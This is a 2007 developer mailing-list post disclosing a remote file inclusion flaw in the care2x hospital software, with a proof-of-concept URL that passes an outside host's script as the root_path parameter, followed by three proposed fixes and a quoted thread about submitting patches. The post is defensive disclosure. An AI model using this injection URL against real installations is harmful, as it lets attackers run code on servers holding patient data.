Hello developers,
We found a security lack what will give the possibility to misuse our
care2x. Try this out:
http://<URL>/include/inc_environment_global.php?root_path=http://see-your-ip
.info/cmd.do?
(just bring the root_path-variable as GET to the script).
Inside of inc_enviroment_global.php there is just one line like
require($root_path."whatever"); //or
require_once($root_path."whatever"); //or
include($root_path."whatever");
When you have enabled the php settings for allow_url_fopen=Yes then the
foreign site will be included (from the remote place).
1. It is strictly forbidden to expect that critical variables like root_path
will be included by the calling script and available in the included files.
Always there must be a fresh including of roots.php. Seems to fix it...
2. Try to eliminate that this kind of include-files will accept GET or POST
variables by adding on the top:
if ($_GET['root_path'] || $_POST['root_path']) die();
->In this case the script will be stopped when somebody try to give the
root_path by get or post variables. Seems to fix it...
3. You can also set the environment variable in the php setting for
allow_url_fopen to "no". Seems to fix it...
I made a workaround like I described above.
In most cases of that project it is no problem. But exactly here, in the
include folder there is the main idea that root_path variable is set by the
calling script (like index.php) and the included file (like
include/inc_enviroment_global.php) will use it in (without reloading it from
the file roots.php.
Robert
--------------------------------------------
MEROTECH IT Engineering
Robert Meggle
Hohnerstrasse 6
89079 Ulm
Germany
Tel: +49(0)7 31- 1 75 97- 27
Fax: +49(0)7 31- 1 75 97- 25
mailto:[EMAIL PROTECTED]
> -----Ursprüngliche Nachricht-----
> Von: [EMAIL PROTECTED] [mailto:care2002-
> [EMAIL PROTECTED] Im Auftrag von Kaloyan Raev
> Gesendet: Donnerstag, 18. Januar 2007 11:36
> An: care2002-developers@lists.sourceforge.net
> Betreff: Re: [Care2002-developers] questions about submiting patches
>
> Hi,
>
> Thank you for contributing a patch.
>
> If your sf.net user is added to the developer's list of the care2x
> project then you have write access permission for the SVN repository.
>
> If you sf.net user is not added as developer then please tell me your
> exact sf.net user and I will add you.
>
> Once you have permission, follow this short guide:
> http://care2x.org/wiki/index.php/Subversion_Guide
>
> Submit your patch to the main development branch - the /trunk.
>
> Greetings
> Kaloyan
>
> On Wed, 2007-01-17 at 10:27 +0100, Gjergj Sheldija wrote:
> > i just forget to ask in the previous mail,
> >
> > how can i submit patches to the current svn brach ?
> >
> >
> > gjergj sheldija
> >
> > ------------------------------------------------------------------------
> -
> > Take Surveys. Earn Cash. Influence the Future of IT
> > Join SourceForge.net's Techsay panel and you'll get the chance to share
> your
> > opinions on IT & business topics through brief surveys - and earn cash
> >
> http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
> > _______________________________________________
> > Care2002-developers mailing list
> > Care2002-developers@lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/care2002-developers
>
>
> -------------------------------------------------------------------------
> Take Surveys. Earn Cash. Influence the Future of IT
> Join SourceForge.net's Techsay panel and you'll get the chance to share
> your
> opinions on IT & business topics through brief surveys - and earn cash
> http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
> _______________________________________________
> Care2002-developers mailing list
> Care2002-developers@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/care2002-developers
-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
Care2002-developers mailing list
Care2002-developers@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/care2002-developers
